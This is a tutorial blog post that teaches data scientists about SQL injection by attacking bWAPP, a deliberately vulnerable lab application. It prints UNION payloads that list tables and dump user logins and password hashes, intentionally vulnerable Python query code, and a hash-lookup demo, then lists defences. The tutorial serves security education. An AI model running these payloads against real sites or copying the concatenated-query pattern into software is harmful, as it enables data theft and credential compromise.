Being aware of Malicious Data Corruption as a Data Scientist (SQL Injection Attack)
Abhinay Dommalapati
Jun 14
Graphic by Cloudflare

Problem
Ever since the advent of computers, there have always been people trying to hack them.
But hacking received a boost when the age of information and data was born.
Information security became a rising concern as hackers found ways to access sensitive data.
Once hackers gain access, they have almost complete power to do whatever they wish with the data.
A hacker could not only steal information, but also undermine its integrity by altering the data so that it misleads whoever relies on it.
Considering the level of competition we experience in the world today, it’s not surprising to find some businesses employing data hijacking methods to undermine the base operations of their competitors.
In this article, we will examine one of the most commonly attempted and still widely used malicious data corruption methods today, a SQL injection attack.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, disclose all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What is a SQL Injection Attack?
As its name suggests, a SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
SQL injections are typically performed on faulty and poorly designed web applications that don’t account for the security vulnerabilities possibly present in the web application’s database management system.
A SQL injection attack can be as short as a single line of code.
It’s a simple but powerful technique that can compromise essentially all of a web application’s data, including highly sensitive information like user logins and passwords, employee information, social security numbers, etc.
Scary stuff!
In a 2012 study, it was observed that the average web application received 4 attack campaigns per month, and retailers received twice as many attacks as other industries.
Moreover, SQL injection (SQLI) was considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project (OWASP).
And in 2013, SQLI was rated the number one attack on the OWASP top ten.
There are four main sub-classes of SQL injection:
- Classic SQLI
- Blind or Inference SQL injection
- Database management system-specific SQLI
- Compounded SQLI
For the purposes of this article, we will look at an example of just a classic SQLI on a publicly available, deliberately vulnerable web application, bWAPP.
This web application was purposely built with many bugs, one of which is a search tool prone to a SQLI.
bWAPP is a PHP application that uses a MySQL database.
It can be hosted on Linux/Windows with Apache/IIS and MySQL.
It can also be installed with WAMP or XAMPP.
Another possibility, and the one used in this article, is to download bee-box, a custom Linux virtual machine that comes pre-installed with bWAPP.
The Bee Box gives you a variety of ways that you can hack and deface the website.
So if this is really interesting for you, feel free to explore!

But I’m a data scientist! Why do I care?
As a data science professional, you may not see this issue as something you should be concerned with.
One may think that this job is for the IT and cybersecurity teams and not the data team.
However, such a view is not only naive, but also ignorant.
Data scientists are seen as some of the most versatile technical professionals in the industry and should be equipped to combat a wide scope of problems the business is facing.
After all, how would a data scientist be able to perform if the company’s data itself is deleted or corrupted?

Running a SQL Injection Attack
Now for the fun part! Let’s perform a SQL injection on bWAPP to demonstrate how simple but powerful a SQL injection can be.
Note: This activity is purely for educational and demonstrative purposes.
We strongly advise against performing a SQLI on an established web application, as it is illegal.
After we fire up our Bee Box, we can click on the bWAPP — Start icon to launch the vulnerable web application.
After logging in (username: bee, password: bug), we can choose which kind of hack we wish to explore.
Choosing SQL Injection (get/search) will direct us to a page with a search bar for movies.
If we simply click on the Search button without entering anything in the search bar, we get a list of the movies in the database.
The SQL query for this search bar would look something like this:
SELECT Title, Release, Character, Genre, IMDb FROM movies WHERE Title LIKE '%$_GET['title']'
Now, in order to infiltrate the database, we want to break the query by causing an error.
This will tell us whether the web application is prone to a SQL injection.
The example below makes this clearer.
Entering a ' character in the form, whose contents the site uses in its SQL query, ends the string in the query early and causes a syntax error, which is output to the page.
So this is bad.
No web application should output a MySQL syntax error when an unexpected input is entered.
It should instead say something like “Movie not found”.
However, the problem is that the PHP code places the input into the SQL query without escaping it, so the database treats the ' character as part of the SQL syntax (the end of a string) instead of as a literal character.
As a result, the query is now broken: the SQL database can’t parse it and spits out an error.
So the SQL query with the ' character now becomes:
SELECT Title, Release, Character, Genre, IMDb FROM movies WHERE Title LIKE '%''
Notice the dangling single quote at the end, which is the root of the error.
But this is good from a hacker’s perspective.
We can now exploit this error to control the database by literally inputting our own malicious SQL queries.
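To make the broken query concrete, here is a minimal Python sketch that uses the standard sqlite3 module as a stand-in for bWAPP's PHP and MySQL stack. The table, the sample row, and the build_query and search_movies helpers are all hypothetical; only the shape of the query follows the one shown earlier. It builds the query by string concatenation, shows what a lone ' does to it, and returns a generic message instead of echoing the database error.

```python
import sqlite3

# Hypothetical stand-in for the movies table (not bWAPP's real schema).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE movies (title TEXT, genre TEXT)")
conn.execute("INSERT INTO movies VALUES ('Iron Man', 'action')")


def build_query(title):
    # Vulnerable on purpose: user input is pasted straight into the SQL text.
    return "SELECT title, genre FROM movies WHERE title LIKE '%" + title + "'"


def search_movies(title):
    try:
        rows = conn.execute(build_query(title)).fetchall()
    except sqlite3.Error:
        # The real error belongs in a server-side log, not on the page.
        return "Movie not found"
    return rows if rows else "Movie not found"


print(build_query("Man"))    # a well-formed query
print(build_query("'"))      # the lone quote leaves the string literal unbalanced
print(search_movies("Man"))  # rows for titles ending in "Man"
print(search_movies("'"))    # generic message, no database error shown
```

Note that hiding the error only removes the hint an attacker is looking for. As long as the query is built by concatenation, it is still injectable.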
After figuring out how many columns exist in the table (7 in this case), we can type the following into the search bar to get a list of all the tables in the database.
' union select 1, table_name, 3, 4, 5, 6, 7 from information_schema.tables-- -
All this query does is perform a union command, which pulls all the table names in the database and posts them underneath the normal list of movies we saw earlier.
The trailing -- - starts a SQL comment, so whatever is left of the original query after our input is ignored.
These are just some of the tables we were able to pull from the database, but you’ll realize when you run this yourself how many more tables we are able to pull.
Fortunately, we were able to find the table that we are interested in, users.
We should be able to find some login information in this table, so let’s dive deeper.
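For readers without bee-box at hand, the same UNION trick can be reproduced in a few lines of Python. This is only a sketch under stated assumptions: it uses an in-memory SQLite database rather than MySQL, so the table names come from sqlite_master (SQLite's rough counterpart to information_schema.tables), and the tables, the three-column layout, and the vulnerable_search helper are made up for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE movies (title TEXT, release_year INTEGER, genre TEXT);
    CREATE TABLE users (login TEXT, password TEXT);
    INSERT INTO movies VALUES ('Iron Man', 2008, 'action');
    INSERT INTO users VALUES ('bee', 'placeholder-hash');
    """
)


def vulnerable_search(title):
    # Input is concatenated into the SQL text, so it can rewrite the query.
    query = (
        "SELECT title, release_year, genre FROM movies "
        "WHERE title LIKE '%" + title + "'"
    )
    return conn.execute(query).fetchall()


# The payload closes the string literal, appends a UNION with the same
# number of columns as the original SELECT (3 in this sketch), and uses
# "-- -" to comment out the quote left over from the original query.
payload = "' UNION SELECT name, 2, 3 FROM sqlite_master WHERE type = 'table'-- -"

rows = vulnerable_search(payload)
for row in rows:
    print(row)
```

The movie rows come back as usual, followed by one extra row per table, with the table name sitting in the title column.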
Entering the following query will give us the names of the columns in the users table.
' union select 1, column_name, 3, 4, 5, 6, 7 from information_schema.columns where table_name = "users"-- -
Notice how we specify the users table in this query.
And there we go! Just a couple of queries and we’ve found the columns that hold the usernames and passwords for website users!
Moving on…
' union select 1, login, 3, 4, 5, 6, 7 from users-- -
And now for the passwords…
' union select 1, password, 3, 4, 5, 6, 7 from users-- -
So these are the hashed passwords for the login information.
Strictly speaking, a hash cannot be decrypted, but recovering the password behind one is often a fairly simple task when the password is common and the hash is unsalted.
You could simply copy and paste the hash value into Google and you’ll find lookup sites that will do the task for you.
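Why is this lookup so easy? A rough sketch, assuming the passwords are stored as unsalted SHA-1 hashes (the article does not name the algorithm, so treat that as an assumption), is that anyone can hash a list of common passwords once and then reverse a leaked hash with a dictionary lookup. The wordlist and variable names below are hypothetical.

```python
import hashlib


def sha1_hex(text):
    # Hex digest of the UTF-8 encoded text, with no salt added.
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


# Hypothetical tiny wordlist; real lookup services index far more entries.
common_passwords = ["123456", "password", "qwerty", "bug", "letmein"]

# Precompute hash -> password once; afterwards each lookup is a dict access.
lookup_table = {sha1_hex(word): word for word in common_passwords}

# Stand-in for a hash copied out of the users table.
leaked_hash = sha1_hex("bug")

recovered = lookup_table.get(leaked_hash)
print(recovered)

# A password that is not in the wordlist is not recovered this way.
print(lookup_table.get(sha1_hex("a long and unusual passphrase")))
```

A per-user salt or a deliberately slow password hashing function makes this kind of precomputed table far less useful.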

Conclusion
So you saw how easy that was.
Just a couple lines of code and you have the entire database of the web application literally at your fingertips.
Although sanitization methods have countered many of the SQL injection attacks we face today, web applications developed by individuals who are inexperienced in cybersecurity or unaware of SQL injections are highly vulnerable to a data compromise.
A SQL injection would obviously not work in a Google search bar due to the many sanitization methods that Google would employ.
Some of the sanitization methods that could be employed to avoid SQL injection attacks include, but are not limited to:
- Parametrized statements: binding user input to a parameter instead of embedding user input in the statement
- Escaping: creating a comprehensive blacklist of characters that need translation
- Pattern Check: requiring strings to follow some sort of strict pattern (date, UUID, alphanumeric only, etc.)
- Database Permissions: limiting the permissions on the database login used by the web application to only what is needed
Although it may not be the data scientist’s job to implement some of these safeguards, it’s important for the data scientist to at least be aware of SQL injection, especially if the data scientist is working at a small firm or startup in which the web applications may not be fully secure.
Furthermore, data scientists should be aware that the data they query with SQL had to originate somewhere.
Some database manager or administrator put that data together in a relational database, and if they didn’t account for SQL injections, the data scientist bears the burden of reporting misleading insights from tampered information.
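Two of the safeguards listed above, parametrized statements and a pattern check, can be sketched in Python with the standard sqlite3 and re modules. This is a minimal illustration rather than a complete defense: the table, the parametrized_search and is_valid_title helpers, and the allowed-character pattern are all assumptions made for the example.

```python
import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE movies (title TEXT);
    CREATE TABLE users (login TEXT, password TEXT);
    INSERT INTO movies VALUES ('Iron Man');
    """
)

# Hypothetical rule: titles are 1 to 50 letters, digits, or spaces.
TITLE_PATTERN = re.compile(r"[A-Za-z0-9 ]{1,50}")


def is_valid_title(title):
    # Pattern check: reject anything outside the expected character set.
    return TITLE_PATTERN.fullmatch(title) is not None


def parametrized_search(title):
    # Parametrized statement: the ? placeholder binds the value as data,
    # so quotes inside it never become part of the SQL syntax.
    sql = "SELECT title FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title,)).fetchall()


payload = "' UNION SELECT name FROM sqlite_master-- -"

print(parametrized_search("Man"))    # normal search still works
print(parametrized_search(payload))  # payload is treated as a literal title
print(is_valid_title("Iron Man"))
print(is_valid_title(payload))
```

With the placeholder in place, the payload is just an odd-looking search string that matches no movie, and the pattern check would have rejected it before it reached the database at all.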